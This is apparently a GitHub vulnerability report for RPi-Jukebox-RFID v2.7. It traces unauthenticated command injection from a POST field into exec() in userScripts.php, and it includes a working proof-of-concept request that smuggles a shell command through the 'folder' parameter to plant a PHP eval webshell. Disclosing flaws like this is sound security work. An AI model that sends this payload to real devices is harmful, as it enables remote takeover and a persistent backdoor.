Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)

Analysis

The path of the vulnerability: htdocs\userScripts.php

$post['filename'] = $_POST['filename'];  //Line 46 (Source)
if($_POST['ACTION'] == "userScript") {  // Line 62 (Check point)
    $messageAction.="Executed'sudo".$conf['scripts_abs']."/userscripts/".$post['folder']."".$post['folderNew']."'";    // Line 64 (Tainted)
    $exec="sudo".$conf['scripts_abs']."/userscripts/".$post['folder']."".$post['folderNew'];    // Line 67 (Tainted)

 exec($exec);   // Line 68(Sink)
}

Source from Line 46 ($_POST['filename']) .

And then there is a check point(Line 62) ,which we should set $_POST['ACTION'] = userScript to bypass.

After bypass the check point, the source(tainted) pass to $exec and exec($exec);(Line 68) without another check.

Poc

POST /htdocs/userScripts.php

Data:

ACTION=userScript&folder=hello+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell4.php+%3b&folderNew=echo+%22hello%22

Here is the version without url encoding for ease of understanding:

ACTION=userScript&folder=hello ; echo "<?php @eval($_POST['pass']) ?>" > ./shell4.php ;&folderNew=echo "hello"

Manual verification

The attacker can then easily connect to this webshell(/htdocs/shell4.php)

Logs

No response

Configuration

No response

More info

No response

MiczFlor / RPi-Jukebox-RFID

🐛 | RPi-Jukebox-RFID V2.7_RCE_4 #2399

Version

Branch

OS

Pi model

Hardware

What happened?

Analysis

Poc

Manual verification

Logs

Configuration

More info

Poc_fixed